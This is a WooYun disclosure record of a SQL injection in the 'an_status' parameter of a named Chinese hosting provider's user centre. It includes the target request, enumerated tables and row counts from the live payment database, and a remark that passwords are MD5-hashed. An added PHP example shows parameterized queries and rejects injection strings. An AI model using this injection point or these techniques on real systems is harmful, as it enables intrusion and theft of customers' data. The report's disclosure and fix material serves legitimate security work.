WooYun (WooYun.org) historical vulnerability lookup: http://wy.zone.ci/
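2016-04-15: Details reported to the vendor; awaiting vendor handling
2016-04-15: Vendor has confirmed; details disclosed to the vendor only
2016-04-25: Details disclosed to core white hats and experts in related fields
2016-05-05: Details disclosed to regular white hats
2016-05-15: Details disclosed to intern white hats
2016-05-30: Details disclosed to the public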
https://uc.qycn.com/login.php
Injection parameter: an_status
GET https://uc.qycn.com/announcement.php?an_status=1&act=search&an_publish_time=%E8%AF%B7%E9%80%89%E6%8B%A9%E5%8F%91%E5%B8%83%E6%97%A5%E6%9C%9F&an_end_time=%E8%AF%B7%E9%80%89%E6%8B%A9%E7%BB%93%E6%9D%9F%E6%97%A5%E6%9C%9F&keyword=%E8%AF%B7%E8%BE%93%E5%85%A5%E5%85%B3%E9%94%AE%E5%AD%97&type=list&submit=%E6%90%9C+%E7%B4%A2 HTTP/1.1
Host: uc.qycn.com
Connection: keep-alive
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.85 Safari/537.36
Referer: https://uc.qycn.com/announcement.php?act=list
Accept-Encoding: gzip, deflate, sdch
Accept-Language: zh-CN,zh;q=0.8
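How the server side could handle the an_status parameter from the request above, as an added example that is not part of the original report or the vendor's code. The table and column layout, the allowed status values (0 and 1) and the in-memory SQLite database standing in for the real one are all assumptions.

```php
<?php
declare(strict_types=1);

// Hypothetical stand-in for the announcement table (constructed sample data).
function demoDb(): PDO
{
    $pdo = new PDO('sqlite::memory:');
    $pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
    $pdo->exec('CREATE TABLE announcement (id INTEGER PRIMARY KEY, title TEXT, an_status INTEGER)');
    $pdo->exec("INSERT INTO announcement (title, an_status) VALUES
        ('Maintenance window', 1), ('Price update', 1), ('Draft notice', 0)");
    return $pdo;
}

// Accept an_status only if it is a plain integer from an allow-list
// (the allowed values 0 and 1 are an assumption).
function parseStatus(mixed $raw): ?int
{
    $status = filter_var($raw, FILTER_VALIDATE_INT);
    return ($status !== false && in_array($status, [0, 1], true)) ? $status : null;
}

// Values are bound as typed parameters and never concatenated into the SQL text.
function searchAnnouncements(PDO $pdo, mixed $rawStatus, string $keyword = ''): array
{
    $status = parseStatus($rawStatus);
    if ($status === null) {
        throw new InvalidArgumentException('invalid an_status');
    }
    $stmt = $pdo->prepare(
        'SELECT id, title FROM announcement WHERE an_status = :status AND title LIKE :kw'
    );
    $stmt->bindValue(':status', $status, PDO::PARAM_INT);
    $stmt->bindValue(':kw', '%' . $keyword . '%', PDO::PARAM_STR);
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

$pdo = demoDb();
// Constructed inputs: one well-formed value, then malformed ones that must be rejected.
foreach (['1', '1 OR 1=1', "1'", ['1']] as $input) {
    try {
        $rows = searchAnnouncements($pdo, $input);
        printf("%s -> %d rows\n", json_encode($input), count($rows));
    } catch (InvalidArgumentException $e) {
        printf("%s -> rejected\n", json_encode($input));
    }
}
```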
dbs:
A million orders:
Database: newqycn_pay
+-------------------------+---------+
| Table                   | Entries |
+-------------------------+---------+
| qy_order                | 996877  |
| qy_business             | 471212  |
| qy_order_buydetail      | 437606  |
| qy_useraccount          | 418035  |
| qy_order_serviceparams  | 309086  |
| qy_order_service        | 300540  |
| qy_account_log          | 177322  |
| qy_order_sms            | 133378  |
| qy_order_regdomain      | 93107   |
| qy_pay_logs             | 83300   |
| qy_order_domain         | 76166   |
| qy_order_payment        | 35233   |
| qy_order_dns            | 19719   |
| qy_yeepay_log           | 8797    |
| qy_paypricelog          | 3020    |
| qy_payment_statis       | 1544    |
| qy_order_transfer       | 799     |
| qy_order_servicegift    | 438     |
| qy_order_receipt        | 365     |
| qy_manual_pay           | 317     |
| qy_order_device         | 178     |
| qy_order_address        | 176     |
| qy_order_voice          | 137     |
| qy_order_auth           | 98      |
| qy_order_safe           | 95      |
| qy_orderinfo            | 63      |
| qy_order_jk             | 61      |
| qy_safe_info            | 15      |
| qy_order_payment_client | 9       |
| qy_safe_checkinfo       | 7       |
+-------------------------+---------+
A million user records:
The database can be dumped; passwords are stored as MD5 hashes:
Severity: High
Vulnerability Rank: 15
Confirmation time: 2016-04-15 14:13
Thank you for your support; we will arrange follow-up right away!
None yet